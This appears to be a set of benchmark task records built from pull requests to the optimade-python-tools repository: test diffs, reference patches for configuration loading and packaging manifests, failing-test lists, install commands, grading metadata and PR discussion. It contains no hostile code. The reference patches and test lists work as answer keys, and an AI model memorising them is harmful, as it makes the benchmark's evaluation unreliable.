diff --git a/tests/models/test_models.py b/tests/models/test_models.py index 072141d3..3c4e7ac0 100644 --- a/tests/models/test_models.py +++ b/tests/models/test_models.py @@ -59,18 +59,45 @@ class TestPydanticValidation(unittest.TestCase): StructureResource(**StructureMapper.map_back(structure)) def test_simple_relationships(self): + """Make sure relationship resources are added to the correct relationship""" + + good_relationships = ( + {"references": {"data": [{"id": "dijkstra1968", "type": "references"}]}}, + {"structures": {"data": [{"id": "dijkstra1968", "type": "structures"}]}}, + ) + for relationship in good_relationships: + EntryRelationships(**relationship) + + bad_relationships = ( + {"references": {"data": [{"id": "dijkstra1968", "type": "structures"}]}}, + {"structures": {"data": [{"id": "dijkstra1968", "type": "references"}]}}, + ) + for relationship in bad_relationships: + with self.assertRaises(ValidationError): + EntryRelationships(**relationship) + + def test_advanced_relationships(self): + """Make sure the rules for the base resource 'meta' field are upheld""" + relationship = { - "references": {"data": [{"id": "dijkstra1968", "type": "references"}]} + "references": { + "data": [ + { + "id": "dijkstra1968", + "type": "references", + "meta": { + "description": "Reference for the search algorithm Dijkstra." + }, + } + ] + } } EntryRelationships(**relationship) relationship = { - "references": {"data": [{"id": "dijkstra1968", "type": "structures"}]} - } - with self.assertRaises(ValidationError): - EntryRelationships(**relationship) - relationship = { - "references": {"data": [{"id": "dijkstra1968", "type": "structures"}]} + "references": { + "data": [{"id": "dijkstra1968", "type": "references", "meta": {}}] + } } with self.assertRaises(ValidationError): EntryRelationships(**relationship)
[ "tests/models/test_models.py::TestPydanticValidation::test_advanced_relationships" ]
[ "tests/models/test_models.py::TestPydanticValidation::test_bad_references", "tests/models/test_models.py::TestPydanticValidation::test_bad_structures", "tests/models/test_models.py::TestPydanticValidation::test_good_references", "tests/models/test_models.py::TestPydanticValidation::test_good_structures", "tests/models/test_models.py::TestPydanticValidation::test_more_good_structures", "tests/models/test_models.py::TestPydanticValidation::test_simple_relationships", "tests/models/test_models.py::test_constrained_list" ]
Class: BaseRealationshipMeta(description: str) Location: optimade/models/optimade_json.py Inputs: <description: str – required, human‑readable description of the relationship> Outputs: <BaseRealationshipMeta instance; ValidationError if description missing or not a string> Description: Model for the optional “meta” object attached to a relationship resource; the field *description* must be present when the meta object is supplied. Class: BaseRelationshipResource(id: str, type: str, meta: Optional[BaseRealationshipMeta] = None) Location: optimade/models/optimade_json.py Inputs: <id: str – resource identifier; type: str – resource type; meta: optional BaseRealationshipMeta instance (must contain description if provided)> Outputs: <BaseRelationshipResource instance; ValidationError if id or type missing/invalid, or if meta is supplied without a description> Description: Extends the generic JSON:API resource model for relationship resources, adding an optional *meta* field that must contain a *description* when present. Class: Relationship(data: Optional[Union[BaseRelationshipResource, List[BaseRelationshipResource]]] = None, …) Location: optimade/models/optimade_json.py Inputs: <data: either a single BaseRelationshipResource, a list of them, or None; other standard JSON:API relationship fields (links, meta, etc.)> Outputs: <Relationship instance; ValidationError if *data* contains resources of the wrong type or if any contained BaseRelationshipResource’s meta is malformed> Description: JSON:API relationship model extended for OPTiMaDe; the *data* linkage can reference relationship resources that may include the optional *meta* object with required description.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/models/test_models.py" }
{ "num_modified_files": 9, "num_modified_lines": 113, "pr_author": "CasperWA", "pr_labels": [ "schema: Concerns the OpenAPI schema" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding an optional `meta` field to relationship resources, where the meta must contain a `description` if present. The provided test patch adds checks that a valid description passes validation and that missing or empty description triggers a ValidationError, directly reflecting the requirement. The tests align with the stated behavior and no hidden expectations, external URLs, or naming constraints are present, indicating a clear, solvable task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
69d215c1b5c9e956b150c3b010d4e1ba8bba905d
2020-01-16 11:03:40
materials-consortia__optimade-python-tools-137
diff --git a/optimade/server/config.py b/optimade/server/config.py index de1a38aa..ac75fcaa 100644 --- a/optimade/server/config.py +++ b/optimade/server/config.py @@ -146,7 +146,7 @@ class ServerConfig(Config): self.implementation = {} for field in Implementation.schema()["properties"]: value_config = config.get("IMPLEMENTATION", field, fallback=None) - value_default = self._DEFAULTS(f"implementation")[field] + value_default = self._DEFAULTS("implementation")[field] if value_config is not None: self.implementation[field] = value_config elif value_default is not None: @@ -191,18 +191,18 @@ class ServerConfig(Config): setattr( self, f"{endpoint}_collection", - config.get(f"{endpoint}_collection"), - getattr(self._DEFAULTS(f"{endpoint}_collection")), + config.get( + f"{endpoint}_collection", self._DEFAULTS(f"{endpoint}_collection") + ), ) self.page_limit = int(config.get("page_limit", self._DEFAULTS("page_limit"))) - self.version = config.get("api_version", self._DEFAULTS("api_version")) self.default_db = config.get("default_db", self._DEFAULTS("default_db")) # This is done in this way, since each field is OPTIONAL self.implementation = config.get("implementation", {}) for field in Implementation.schema()["properties"]: - value_default = self._DEFAULTS(f"implementation.{field}") + value_default = self._DEFAULTS("implementation")[field] if field in self.implementation: # Keep the config value pass @@ -210,9 +210,11 @@ class ServerConfig(Config): self.implementation[field] = value_default self.provider = config.get("provider", self._DEFAULTS("provider")) - self.provider_fields = set( - config.get("provider_fields", self._DEFAULTS("provider_fields")) - ) + self.provider_fields = {} + for endpoint in {"structures", "references"}: + self.provider_fields[endpoint] = set( + config.get("provider_fields", {}).get(endpoint, []) + ) CONFIG = ServerConfig()
Fix `load_from_json` This function did not work properly. Add test file for config.py, for now only with a simple test to run `load_from_json()`. Feel free to add more tests to `test_config.py` either in this PR or later.
**Title** Correct defaults handling and provider‑field mapping in server configuration loading **Problem** The configuration loader failed to apply default values for implementation settings, collection parameters, and provider fields, causing missing or incorrect configuration state when `load_from_json()` is used. **Root Cause** Defaults were accessed with malformed keys and provider fields were treated as a single flat set rather than per‑endpoint mappings. **Fix / Expected Behavior** - Retrieve implementation defaults using the correct identifier. - Populate each collection attribute with its specific fallback default when not explicitly set. - Apply scalar defaults (e.g., API version, page limit) correctly during loading. - Store provider fields as a dictionary keyed by endpoint, each containing a set of field names. - Ensure `load_from_json()` returns a fully populated configuration object that respects both supplied values and defaults. **Risk & Validation** - Confirm existing configuration files load unchanged and produce expected defaults. - Add tests covering partial and full configuration scenarios for `load_from_json()`. - Run the complete test suite to detect any regressions elsewhere.
137
Materials-Consortia/optimade-python-tools
diff --git a/tests/server/config_test.ini b/tests/server/config_test.ini new file mode 100644 index 00000000..17ece366 --- /dev/null +++ b/tests/server/config_test.ini @@ -0,0 +1,25 @@ +[BACKEND] +USE_REAL_MONGO = no +MONGO_DATABASE = optimade +LINKS_COLLECTION = links +REFERENCES_COLLECTION = references +STRUCTURES_COLLECTION = structures + +[SERVER] +PAGE_LIMIT = 500 +DEFAULT_DB = test_server + +[IMPLEMENTATION] +name = Example implementation +source_url = https://github.com/Materials-Consortia/optimade-python-tools + +[PROVIDER] +prefix = _exmpl_ +name = Example provider +description = Provider used for examples, not to be assigned to a real database +homepage = http://example.com +index_base_url = http://localhost:5001/index/optimade + +[structures] +band_gap : +_mp_chemsys : diff --git a/tests/server/config_test.json b/tests/server/config_test.json new file mode 100644 index 00000000..a1ab885c --- /dev/null +++ b/tests/server/config_test.json @@ -0,0 +1,26 @@ +{ + "use_real_mongo": false, + "mongo_database": "optimade", + "links_collection": "links", + "references_collection": "references", + "structures_collection": "structures", + "page_limit": 500, + "default_db": "test_server", + "implementation": { + "name": "Example implementation", + "source_url": "https://github.com/Materials-Consortia/optimade-python-tools" + }, + "provider": { + "prefix": "_exmpl_", + "name": "Example provider", + "description": "Provider used for examples, not to be assigned to a real database", + "homepage": "http://example.com", + "index_base_url": "http://localhost:5001/index/optimade" + }, + "provider_fields": { + "structures": [ + "band_gap", + "_mp_chemsys" + ] + } +} diff --git a/tests/server/server_test_ini.cfg b/tests/server/server_test_ini.cfg new file mode 100644 index 00000000..b487c807 --- /dev/null +++ b/tests/server/server_test_ini.cfg @@ -0,0 +1,3 @@ +[optimadeconfig] +CONFIG = ./config_test.ini +# INDEX_LINKS = ./index_links.json diff --git a/tests/server/server_test_json.cfg b/tests/server/server_test_json.cfg new file mode 100644 index 00000000..3e77e7a5 --- /dev/null +++ b/tests/server/server_test_json.cfg @@ -0,0 +1,3 @@ +[optimadeconfig] +CONFIG = ./config_test.json +# INDEX_LINKS = ./index_links.json diff --git a/tests/server/test_config.py b/tests/server/test_config.py new file mode 100644 index 00000000..3efc30a1 --- /dev/null +++ b/tests/server/test_config.py @@ -0,0 +1,40 @@ +# pylint: disable=import-outside-toplevel,protected-access,pointless-statement +import unittest + +from pathlib import Path + + +class LoadFromIniTest(unittest.TestCase): + """Test server.config.ServerConfig.load_from_ini""" + + def test_config_ini(self): + """Invoke CONFIG using config_test.ini""" + from optimade.server.config import ServerConfig + + CONFIG = ServerConfig( + server_cfg=Path(__file__).parent.joinpath("server_test_ini.cfg").resolve() + ) + + CONFIG.default_db # Initiate CONFIG, running load_from_json() + # _path should now be updated with the correct path to the config json file: + self.assertEqual( + CONFIG._path, Path(__file__).parent.joinpath("config_test.ini").resolve() + ) + + +class LoadFromJsonTest(unittest.TestCase): + """Test server.config.ServerConfig.load_from_json""" + + def test_config_json(self): + """Invoke CONFIG using config_test.json""" + from optimade.server.config import ServerConfig + + CONFIG = ServerConfig( + server_cfg=Path(__file__).parent.joinpath("server_test_json.cfg").resolve() + ) + + CONFIG.default_db # Initiate CONFIG, running load_from_json() + # _path should now be updated with the correct path to the config json file: + self.assertEqual( + CONFIG._path, Path(__file__).parent.joinpath("config_test.json").resolve() + )
[ "tests/server/test_config.py::LoadFromJsonTest::test_config_json" ]
[ "tests/server/test_config.py::LoadFromIniTest::test_config_ini" ]
Method: ServerConfig.__init__(self, server_cfg: pathlib.Path) Location: optimade/server/config.py – class `ServerConfig` constructor Inputs: `server_cfg` – a `Path` object pointing to a server configuration file (INI or JSON) that contains an `[optimadeconfig]` section with a `CONFIG` entry referencing the actual Optimade configuration file. Outputs: Returns a new `ServerConfig` instance. The instance initially holds the path to the server‑config file; the real configuration file path is stored in the private attribute `_path` after the first lazy load (triggered by accessing any configuration attribute such as `default_db`). Description: Instantiates a server‑side configuration object that resolves the provided server‑config file, determines the underlying Optimade configuration file (INI or JSON), and prepares lazy loading of configuration values. Function: ServerConfig.default_db (property) Location: optimade/server/config.py – lazily‑loaded attribute of `ServerConfig` Inputs: None (accessed as an attribute) Outputs: Returns the configured default database name as a string; accessing this property also triggers loading of the full configuration and updates the internal `_path` to the resolved config file path. Description: Provides the default database name defined in the Optimade configuration; accessing it forces the configuration to be parsed (including a call to `load_from_json` when appropriate).
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/server/test_config.py" }
{ "num_modified_files": 1, "num_modified_lines": 10, "pr_author": "CasperWA", "pr_labels": [ "bug: Something isn't working" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue asks to fix `ServerConfig.load_from_json` so that after initialization the internal `_path` points to the correct config file, as verified by the new tests. The tests clearly assert this behavior and no other hidden requirements are introduced. There are no signs of test coupling, missing names, external dependencies, unrelated patch artifacts, or hidden domain knowledge, so the task is a straightforward bug fix (SOLVABLE).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
5a5e9039997e7095661cb2b24bcff2ed5ba44a34
2020-03-12 15:50:53
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/225?src=pr&el=h1) Report > Merging [#225](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/225?src=pr&el=desc) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/5a5e9039997e7095661cb2b24bcff2ed5ba44a34&el=desc) will **not change** coverage by `%`. > The diff coverage is `n/a`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/225/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/225?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #225 +/- ## ======================================= Coverage 87.55% 87.55% ======================================= Files 43 43 Lines 1912 1912 ======================================= Hits 1674 1674 Misses 238 238 ``` | Flag | Coverage Δ | | |---|---|---| | #unittests | `87.55% <ø> (ø)` | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/225?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/225?src=pr&el=footer). Last update [5a5e903...260f2fe](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/225?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). CasperWA: > Thanks for catching this, assume this is no problem for #214. It seems he will [start over](https://github.com/Materials-Consortia/optimade-python-tools/pull/224#issuecomment-598340949) 😮
materials-consortia__optimade-python-tools-225
diff --git a/MANIFEST.in b/MANIFEST.in index 4a047b4d..ad0839c8 100644 --- a/MANIFEST.in +++ b/MANIFEST.in @@ -1,3 +1,4 @@ recursive-include optimade/server/ *.ini *.json recursive-include optimade/server/data/ * recursive-include optimade/grammar/ *.lark +recursive-include optimade/validator/data/ *.txt
Add txt-files in optimade.validator.data to MANIFEST Also added to `test_setup.py` test. I found this error, since I couldn't install the latest commit when testing Materials-Consortia/optimade-validator-action#4
**Title** Include validator text resources in the source distribution **Problem** The package's source distribution omitted the plain‑text files used by the validator component, causing installation failures and test errors when those resources are accessed. **Root Cause** The manifest configuration did not list the validator’s `.txt` data files, so they were excluded from built wheels and source releases. **Fix / Expected Behavior** - Extend the manifest to package the validator’s text files. - Ensure the validator can locate and read its data files after installation. - Allow the project’s packaging test suite to succeed. - Preserve existing package contents and structure. **Risk & Validation** - Verify that only the intended `.txt` resources are added, avoiding accidental inclusion of extraneous files. - Run the full test suite, including the packaging test, to confirm successful installation and validator functionality. - Perform a clean build/install cycle to ensure the distributed package contains the new resources.
225
Materials-Consortia/optimade-python-tools
diff --git a/tests/test_setup.py b/tests/test_setup.py index ff972b7a..408df991 100644 --- a/tests/test_setup.py +++ b/tests/test_setup.py @@ -35,6 +35,8 @@ class TestSetup(unittest.TestCase): r"test_structures\.json": False, r"test_references\.json": False, r"test_links\.json": False, + r"filters\.txt": False, + r"optional_filters\.txt": False, } count = 0 for line in lines:
[ "tests/test_setup.py::TestSetup::test_distributions_package" ]
[]
No new interfaces are introduced.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/test_setup.py" }
{ "num_modified_files": 1, "num_modified_lines": 1, "pr_author": "CasperWA", "pr_labels": [ "bug: Something isn't working", "priority/high: Issue or PR with a consensus of high priority", "tests: Related to tests" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "dev_ops_enh", "minor_bug" ], "reason": null, "reasoning": "The issue requests that the .txt files in optimade.validator.data be included in the package distribution by updating MANIFEST.in, and the test was updated to check for those files. The test expectations directly match the requested change, with no hidden requirements or unrelated test behavior. There are no ambiguous specifications, external references, or implicit naming problems. Therefore the task is clearly defined and solvable (code A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
ed508390a18b67a040c629b284b83f48327d60aa
2020-03-28 17:31:49
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241?src=pr&el=h1) Report > Merging [#241](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241?src=pr&el=desc) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/7768f62f2530c8310ae77fe92556a91f2dfe91af&el=desc) will **decrease** coverage by `12.70%`. > The diff coverage is `0.00%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/graphs/tree.svg?width=650&height=150&src=pr&token=UJAtmqkZZO)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #241 +/- ## =========================================== - Coverage 87.11% 74.40% -12.71% =========================================== Files 43 51 +8 Lines 1862 2180 +318 =========================================== Hits 1622 1622 - Misses 240 558 +318 ``` | Flag | Coverage Δ | | |---|---|---| | #unittests | `74.40% <0.00%> (-12.71%)` | :arrow_down: | | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [optimade/adapters/\_\_init\_\_.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree#diff-b3B0aW1hZGUvYWRhcHRlcnMvX19pbml0X18ucHk=) | `0.00% <0.00%> (ø)` | | | [optimade/adapters/structures/\_\_init\_\_.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9fX2luaXRfXy5weQ==) | `0.00% <0.00%> (ø)` | | | [optimade/adapters/structures/aiida.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9haWlkYS5weQ==) | `0.00% <0.00%> (ø)` | | | [optimade/adapters/structures/ase.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9hc2UucHk=) | `0.00% <0.00%> (ø)` | | | [optimade/adapters/structures/cif.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9jaWYucHk=) | `0.00% <0.00%> (ø)` | | | [optimade/adapters/structures/proteindatabank.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9wcm90ZWluZGF0YWJhbmsucHk=) | `0.00% <0.00%> (ø)` | | | [optimade/adapters/structures/pymatgen.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9weW1hdGdlbi5weQ==) | `0.00% <0.00%> (ø)` | | | [optimade/adapters/structures/utils.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy91dGlscy5weQ==) | `0.00% <0.00%> (ø)` | | | ... and [6 more](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241/diff?src=pr&el=tree-more) | | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241?src=pr&el=footer). Last update [7768f62...e99a8b9](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/241?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). shyamd: I'm not fully seeing what this does. How does this plug into the server for instance? CasperWA: > I'm not fully seeing what this does. How does this plug into the server for instance? It's not for server use, more for client use. The main goal is to interpret OPTIMADE structures and retrieve their information/convert them to client-usable data formats and constructs. CasperWA: > thanks @CasperWA , I think having these converters in the optimade python tools is very useful. Thanks :) Me too, hence the "fold back" from the client I'm working on. > May I suggest to add both individual extras for the corresponding dependencies + a `converters` extra that contains them all? I thought about this, got tired at the idea, and set it aside for a time when I have not more exciting ideas for how the adapter should work. I.e., I will definitely add this to the `setup.py` 👍 ml-evs: Not going to review this until everyone else has finished hacking at it (ping me @CasperWA), but think this looks very useful and is definitely in the spirit of "optimade-python-tools". Once we get this in, I think we should focus for a while on writing docs that showcase how this repo can be used by implementers of servers and clients. Would we even want to provide a simple Python/CLI client implementation in this repo, given that we have most of the tools already? (I guess this would depend on how much this treads on the toes of your fancier client @CasperWA) CasperWA: @ml-evs @ltalirz I consider this ready for review now. I have added a lot of tests, and tried to come up with edge-cases, and what to do for various optional properties. This has hopefully resulted in more robust conversion functions. Some of the conversion function tests are the same from test file to test file. This may be made more elegant, but in order to properly separate out the test functions if one should not have the specific dependency installed, this is the design I chose. Note also, the kind of ugly addition to our CI workflows, due to AiiDA. In order to create a `StructureData` AiiDA Node, one _must_ have a functioning AiiDA profile loaded, hence all the extra stuff. I have opened an issue aiidateam/aiida-core#3898 to try and make this more gentle on the lines of code in our workflows. Since this design idea from the side of AiiDA is so deeply integrated into its code base, it is difficult to see how we can get to a state, where it may not be needed to set up an AiiDA profile, just for testing this. Finally, if you have any optimizations for the various converters, now is the time! :) If you want to add a bunch of new ones (especially to the `references` adapter), perhaps consider either doing it in another PR or _quickly_ add it to this PR :) I know the PDBx/mmCIF is a bit of a mess, but I don't have the time now to research a whole new and to me unknown format to get it properly up to speed - sorry. I feel this is better than nothing for now? CasperWA: > Not going to review this until everyone else has finished hacking at it (ping me @CasperWA), but think this looks very useful and is definitely in the spirit of "optimade-python-tools". Consider yourself "pinged" @ml-evs :) (But not until Tuesday the 14th and onwards). > Once we get this in, I think we should focus for a while on writing docs that showcase how this repo can be used by implementers of servers and clients. (...) I think that would definitely be the next big "project" for the repo. Also, we should make sure to update to v1.0.0 ASAP (both the package version, but I was thinking mainly of the OPTIMADE API version). Maybe v1 of the package should indeed wait until we have docs in place. > (...) Would we even want to provide a simple Python/CLI client implementation in this repo, given that we have most of the tools already? (I guess this would depend on how much this treads on the toes of your fancier client @CasperWA) So as soon as this PR goes through, we could (in theory) adopt my client. That way I can update the current version with _this_ adapter. And I don't know how fancy it is... But you can now [check it out on binder](https://mybinder.org/v2/gh/aiidalab/aiidalab-optimade/pure_jupyter_version?urlpath=%2Fapps%2FOPTIMADE_general.ipynb) to judge for yourself 😅 I could even move the repository [aiidalab/aiidalab-optimade](https://github.com/aiidalab/aiidalab-optimade) over to Materials-Consortia? I have discussed this loosely with @giovannipizzi already. I would still want to create an AiiDA lab-specific edition of the client, but the most recent version, which is about to be merged into the `develop` branch, is completely AiiDA- and AiiDA lab-agnostic - only depending on the Jupyter environment, really. But I don't know if we want an OPTIMADE client in Jupyter under the Materials-Consortia umbrella? In any case! We should probably create an issue for this discussion, or rather pick it up at a consortium meeting. shyamd: I would say we want to make a stark distinction between a client and a jupyter-widget. The client should be agnostic of use, so generally just a python class that can be instantiated with an OPTIMADE endpoint URL that allows traversal and retrieval. I would argue this `adapters` PR is really a part of the client and not core. We might think about breaking this into 3 namespace-packages. One for core models and definitions. One for the server. One for the client. ml-evs: > Consider yourself "pinged" @ml-evs :) (But not until Tuesday the 14th and onwards). :+1: > I think that would definitely be the next big "project" for the repo. Also, we should make sure to update to v1.0.0 ASAP (both the package version, but I was thinking mainly of the OPTIMADE API version). Maybe v1 of the package should indeed wait until we have docs in place. :+1: > So as soon as this PR goes through, we could (in theory) adopt my client. That way I can update the current version with _this_ adapter. And I don't know how fancy it is... But you can now [check it out on binder](https://mybinder.org/v2/gh/aiidalab/aiidalab-optimade/pure_jupyter_version?urlpath=%2Fapps%2FOPTIMADE_general.ipynb) to judge for yourself sweat_smile This is very impressive, I love it! Definitely going to have a look through the code, I didn't realise ipywidgets could be so powerful. This goes far above and beyond what I had in mind for this repository, but perhaps there is potential for some overlap? I was imagining some simple client classes that allow you to get the pydantic models from a server in pure Python (trivial given that we do this already) and perhaps a small CLI on top of that. This could obviously be achieved with `wget`... perhaps we could think of a simple OPTIMADE use case that could be achieved more easily with this approach, e.g. use the CLI to find all structures of a given formula across all of the providers and stick them in a json file, with an easy way to read it back in with the pydantic models. > In any case! We should probably create an issue for this discussion, or rather pick it up at a consortium meeting. :+1: ml-evs: > I would say we want to make a stark distinction between a client and a jupyter-widget. The client should be agnostic of use, so generally just a python class that can be instantiated with an OPTIMADE endpoint URL that allows traversal and retrieval. I would argue this `adapters` PR is really a part of the client and not core. We might think about breaking this into 3 namespace-packages. One for core models and definitions. One for the server. One for the client. I think we're in agreement, though I'm not against bundling the models/definitions with our example server and a lightweight example client in one package (for now, at least) but we should discuss this at the next meeting. We currently have some entangled layers to unpick, like the server being required to generate an openapi spec (not sure we can get around this), and I don't think our grammar/filtering is mature enough yet to be separated from the example server either, at least not before OPTIMADE 1.0. shyamd: Actually that's exactly what namespace packages are for. We can still develop these packages under the same repo. As a result, build-time cross dependencies are not an issue. Since all the packages will share one version, we can keep them all consistent as well. https://packaging.python.org/guides/packaging-namespace-packages/ For an example on how this works, you might look at our MPContribs repo: https://github.com/materialsproject/MPContribs ml-evs: > Actually that's exactly what namespace packages are for. We can still develop these packages under the same repo. As a result, build-time cross dependencies are not an issue. Since all the packages will share one version, we can keep them all consistent as well. Ah, gotcha, this looks like a sensible way to go then. CasperWA: @ml-evs I haven't addressed all your comments yet, and I don't know how much more I will be able to do today. However, it is in a much better state now, I think. The tests have been modularized and a clear path to doing some centralized testing of all conversion functions has opened up, but not yet followed. Even more, is that it seems most of the modules _can_ indeed handle unknown values, as long as it's explicitly converted to `float("nan")`. CasperWA: All right @ml-evs ! I have finished addressing your review comments, it should be ready for re-review.
materials-consortia__optimade-python-tools-241
